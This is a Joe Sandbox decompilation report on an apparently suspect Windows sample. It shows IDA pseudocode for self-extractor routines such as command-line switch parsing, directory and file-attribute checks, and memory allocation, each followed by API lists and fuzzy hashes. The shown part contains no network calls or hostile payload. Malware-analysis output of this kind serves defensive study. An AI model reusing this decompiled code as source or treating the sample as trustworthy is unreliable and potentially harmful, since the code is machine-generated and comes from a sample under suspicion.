                                                                                                                                                                                                        							_t19 =  &(_t19[1]);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t6 = _a4;
                                                                                                                                                                                                        					 *_t19 = 0;
                                                                                                                                                                                                        					while( *_t6 == 0x20) {
                                                                                                                                                                                                        						_t6 = _t6 + 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return E00A916B3(_t16, _t10, _t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0x8007007a;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(00A98B3E,00A98B3F,00000001,00A98B3E,-00000003,?,00A960EC,00A91140,?), ref: 00A965BA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharPrev
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 122130370-0
                                                                                                                                                                                                        • Opcode ID: a37e989459da95628cfd54a614f1b2c4dbd4a5e98963cd4bd77aa346ba79f88d
                                                                                                                                                                                                        • Instruction ID: cd0a7ed1c148a366d4e80bacd6dfe7f830657b88b4be3ebf645845e57ed672be
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a37e989459da95628cfd54a614f1b2c4dbd4a5e98963cd4bd77aa346ba79f88d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21F04C327042509BDB324A1D9884B66BFDE9F86350F2A016FE8DEC3209CA658C46C3A4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00A9621E() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					0x4f0 = 2;
                                                                                                                                                                                                        					_t9 = E00A9597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00A944B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					 *0xa99124 = E00A96285();
                                                                                                                                                                                                        					_t9 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00A96CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A9623F
                                                                                                                                                                                                          • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                          • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00A94554
                                                                                                                                                                                                          • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 381621628-0
                                                                                                                                                                                                        • Opcode ID: e965ed071ee1cc2cd50997e2d5cb3fbeabc22a071579f6dff1702489c57be00c
                                                                                                                                                                                                        • Instruction ID: f1e592e0f60cdcd737c465d4f1dd8601b2a7d7480960690f837bbe13b8d06b0e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e965ed071ee1cc2cd50997e2d5cb3fbeabc22a071579f6dff1702489c57be00c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDF0B4B0B002086BEF50EB748E02FFE32F8DB94300F40006AB986D6081ED749D458650
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A94B60(signed int _a4) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 = _a4 * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t15 + 0xa98d64)) != 1) {
                                                                                                                                                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0xa98d74)); // executed
                                                                                                                                                                                                        					if(_t9 == 0) {
                                                                                                                                                                                                        						return _t9 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *((intOrPtr*)(_t15 + 0xa98d60)) = 1;
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xa98d60)) = 1;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xa98d68)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xa98d70)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xa98d6c)) = 0;
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A94FA1,00000000), ref: 00A94B98
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
• Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: 9842d290ebcc87940d430a15d3c55379d31849ca4e9d8be37c1feb60278b1272
                                                                                                                                                                                                        • Instruction ID: 3ee9df78f49577059d7e9611a2cc66e57ed969317c33cc20ff95c75869793e47
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9842d290ebcc87940d430a15d3c55379d31849ca4e9d8be37c1feb60278b1272
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7DF01271700B089E5F71CF39CC01A52BBE4AAA6360310092F956ED2190DB35A44ACBD0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A966AE(CHAR* __ecx) {
                                                                                                                                                                                                        				unsigned int _t1;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                        				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,00A94777,?,00A94E38,?), ref: 00A966B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: 834417ffd6525188688ea2ae6dda068b8c3ef242674accaecba9e5d26fad080e
                                                                                                                                                                                                        • Instruction ID: bfeabb89283b6c297189877ecd2c07c7550803149c0ab08b11cf6e63ad53e414
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 834417ffd6525188688ea2ae6dda068b8c3ef242674accaecba9e5d26fad080e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61B09276726440426E2447756C295562981AAD123A7E41B92F132C01E0CE3EC856D044
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A94CA0(long _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x00a94caa
                                                                                                                                                                                                        0x00a94cb1

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00A94CAA
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                                                                                        • Opcode ID: b8a24ac996e79dcd53a972b50cbc5519acf05a227e24810147512d053866c831
                                                                                                                                                                                                        • Instruction ID: d253eca198073c457fb0d2a258c916e7be4b53d557c0d4da7e4801c865e70d32
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8a24ac996e79dcd53a972b50cbc5519acf05a227e24810147512d053866c831
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11B0123214420CB7CF001FC6EC09F853F1DE7C4761F140002F60C494508E73942186D6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00A94CC0(void* _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x00a94cc8
                                                                                                                                                                                                        0x00a94ccf

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2979337801-0
                                                                                                                                                                                                        • Opcode ID: f6cd5e18bcaf910a2e124c54629a74946686fb9f18db4a15ef79c46045144a35
                                                                                                                                                                                                        • Instruction ID: eafdc185d21a0f7425aa8a149d23bc41e0a53b1bc036dcd617b17517e00c319e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6cd5e18bcaf910a2e124c54629a74946686fb9f18db4a15ef79c46045144a35
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69B0123100010CB78F001B86EC088453F1DD6C02607000012F50C454218F33981285C5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00A95C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				CHAR* _v265;
                                                                                                                                                                                                        				char _v266;
                                                                                                                                                                                                        				char _v267;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				CHAR* _v272;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				signed int _v296;
                                                                                                                                                                                                        				char _v556;
                                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				CHAR* _t69;
                                                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				char _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				intOrPtr _t88;
                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                                                        				void* _t111;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				void* _t119;
                                                                                                                                                                                                        				void* _t127;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                        				void* _t142;
                                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                                        				CHAR* _t144;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                                        				void* _t147;
                                                                                                                                                                                                        				void* _t149;
                                                                                                                                                                                                        				char _t155;
                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                        				void* _t162;
                                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                                        				char _t167;
                                                                                                                                                                                                        				char _t170;
                                                                                                                                                                                                        				CHAR* _t173;
                                                                                                                                                                                                        				void* _t177;
                                                                                                                                                                                                        				intOrPtr* _t183;
                                                                                                                                                                                                        				intOrPtr* _t192;
                                                                                                                                                                                                        				CHAR* _t199;
                                                                                                                                                                                                        				void* _t200;
                                                                                                                                                                                                        				CHAR* _t201;
                                                                                                                                                                                                        				void* _t205;
                                                                                                                                                                                                        				void* _t206;
                                                                                                                                                                                                        				int _t209;
                                                                                                                                                                                                        				void* _t210;
                                                                                                                                                                                                        				void* _t212;
                                                                                                                                                                                                        				void* _t213;
                                                                                                                                                                                                        				CHAR* _t218;
                                                                                                                                                                                                        				intOrPtr* _t219;
                                                                                                                                                                                                        				intOrPtr* _t220;
                                                                                                                                                                                                        				signed int _t221;
                                                                                                                                                                                                        				signed int _t223;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t173 = __ecx;
                                                                                                                                                                                                        				_t61 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                        				_push(__ebx);
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_push(__edi);
                                                                                                                                                                                                        				_t209 = 1;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                        					_t63 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					while(_t209 != 0) {
                                                                                                                                                                                                        						_t67 =  *_t173;
                                                                                                                                                                                                        						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                        							_t173 = CharNextA(_t173);
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v272 = _t173;
                                                                                                                                                                                                        						if(_t67 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t69 = _v272;
                                                                                                                                                                                                        							_t177 = 0;
                                                                                                                                                                                                        							_t213 = 0;
                                                                                                                                                                                                        							_t163 = 0;
                                                                                                                                                                                                        							_t202 = 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								if(_t213 != 0) {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L21;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t69 =  *_t69;
                                                                                                                                                                                                        									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t69 = _v272;
                                                                                                                                                                                                        										L21:
                                                                                                                                                                                                        										_t155 =  *_t69;
                                                                                                                                                                                                        										if(_t155 != 0x22) {
                                                                                                                                                                                                        											if(_t202 >= 0x104) {
                                                                                                                                                                                                        												goto L106;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                        												_t177 = _t177 + 1;
                                                                                                                                                                                                        												_t202 = _t202 + 1;
                                                                                                                                                                                                        												_t157 = 1;
                                                                                                                                                                                                        												goto L30;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											if(_v272[1] == 0x22) {
                                                                                                                                                                                                        												if(_t202 >= 0x104) {
                                                                                                                                                                                                        													L106:
                                                                                                                                                                                                        													_t63 = 0;
                                                                                                                                                                                                        													L125:
                                                                                                                                                                                                        													_pop(_t210);
                                                                                                                                                                                                        													_pop(_t212);
                                                                                                                                                                                                        													_pop(_t162);
                                                                                                                                                                                                        													return E00A96CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                        													_t177 = _t177 + 1;
                                                                                                                                                                                                        													_t202 = _t202 + 1;
                                                                                                                                                                                                        													_t157 = 2;
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t157 = 1;
                                                                                                                                                                                                        												if(_t213 != 0) {
                                                                                                                                                                                                        													_t163 = 1;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t213 = 1;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L30;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L131;
                                                                                                                                                                                                        								L30:
                                                                                                                                                                                                        								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                        								_t69 = _v272;
                                                                                                                                                                                                        							} while ( *_t69 != 0);
                                                                                                                                                                                                        							if(_t177 >= 0x104) {
                                                                                                                                                                                                        								E00A96E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                        								asm("int3");
                                                                                                                                                                                                        								_push(_t221);
                                                                                                                                                                                                        								_t222 = _t223;
                                                                                                                                                                                                        								_t71 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                        								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                        									0x4f0 = 2;
                                                                                                                                                                                                        									_t75 = E00A9597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00A944B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                        									 *0xa99124 = E00A96285();
                                                                                                                                                                                                        									_t75 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								return E00A96CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                        								if(_t213 == 0) {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										goto L34;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L40;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										_t79 = _v268;
                                                                                                                                                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                        											if(_t83 == 0) {
                                                                                                                                                                                                        												_t202 = 0x521;
                                                                                                                                                                                                        												E00A944B9(0, 0x521, 0xa91140, 0, 0x40, 0);
                                                                                                                                                                                                        												_t85 =  *0xa98588; // 0x0
                                                                                                                                                                                                        												if(_t85 != 0) {
                                                                                                                                                                                                        													CloseHandle(_t85);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												ExitProcess(0);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t87 = _t83 - 4;
                                                                                                                                                                                                        											if(_t87 == 0) {
                                                                                                                                                                                                        												if(_v266 != 0) {
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t50;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t88 =  *_t183;
                                                                                                                                                                                                        															_t183 = _t183 + 1;
                                                                                                                                                                                                        														} while (_t88 != 0);
                                                                                                                                                                                                        														if(_t183 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t205 = 0x5b;
                                                                                                                                                                                                        															if(E00A9667F(_t215, _t205) == 0) {
                                                                                                                                                                                                        																L115:
                                                                                                                                                                                                        																_t206 = 0x5d;
                                                                                                                                                                                                        																if(E00A9667F(_t215, _t206) == 0) {
                                                                                                                                                                                                        																	L117:
                                                                                                                                                                                                        																	_t202 =  &_v276;
                                                                                                                                                                                                        																	_v276 = _t167;
                                                                                                                                                                                                        																	if(E00A95C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t202 = 0x104;
                                                                                                                                                                                                        																		E00A91680(0xa98c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t202 = 0x5b;
                                                                                                                                                                                                        																	if(E00A9667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		goto L117;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t202 = 0x5d;
                                                                                                                                                                                                        																if(E00A9667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L115;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													 *0xa98a24 = 1;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L50;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t100 = _t87 - 1;
                                                                                                                                                                                                        												if(_t100 == 0) {
                                                                                                                                                                                                        													L98:
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t38;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t101 =  *_t192;
                                                                                                                                                                                                        															_t192 = _t192 + 1;
                                                                                                                                                                                                        														} while (_t101 != 0);
                                                                                                                                                                                                        														if(_t192 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t202 =  &_v276;
                                                                                                                                                                                                        															_v276 = _t170;
                                                                                                                                                                                                        															if(E00A95C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                        																_t218 = 0xa98b3e;
                                                                                                                                                                                                        																_t105 = _v276;
                                                                                                                                                                                                        																if(_t104 != 0x54) {
                                                                                                                                                                                                        																	_t218 = 0xa98a3a;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																E00A91680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                        																_t202 = 0x104;
                                                                                                                                                                                                        																E00A9658A(_t218, 0x104, 0xa91140);
                                                                                                                                                                                                        																if(E00A931E0(_t218) != 0) {
                                                                                                                                                                                                        																	goto L50;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L106;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t111 = _t100 - 0xa;
                                                                                                                                                                                                        													if(_t111 == 0) {
                                                                                                                                                                                                        														if(_v266 != 0) {
                                                                                                                                                                                                        															if(_v266 != 0x3a) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t199 = _v265;
                                                                                                                                                                                                        																if(_t199 != 0) {
                                                                                                                                                                                                        																	_t219 =  &_v265;
                                                                                                                                                                                                        																	do {
                                                                                                                                                                                                        																		_t219 = _t219 + 1;
                                                                                                                                                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                        																		if(_t115 == 0) {
                                                                                                                                                                                                        																			 *0xa98a2c = 1;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			_t200 = 2;
                                                                                                                                                                                                        																			_t119 = _t115 - _t200;
                                                                                                                                                                                                        																			if(_t119 == 0) {
                                                                                                                                                                                                        																				 *0xa98a30 = 1;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				if(_t119 == 0xf) {
                                                                                                                                                                                                        																					 *0xa98a34 = 1;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t209 = 0;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																		_t118 =  *_t219;
                                                                                                                                                                                                        																		_t199 = _t118;
                                                                                                                                                                                                        																	} while (_t118 != 0);
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															 *0xa98a2c = 1;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L50;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t127 = _t111 - 3;
                                                                                                                                                                                                        														if(_t127 == 0) {
                                                                                                                                                                                                        															if(_v266 != 0) {
                                                                                                                                                                                                        																if(_v266 != 0x3a) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                        																	if(_t129 == 0x31) {
                                                                                                                                                                                                        																		goto L76;
                                                                                                                                                                                                        																	} else {
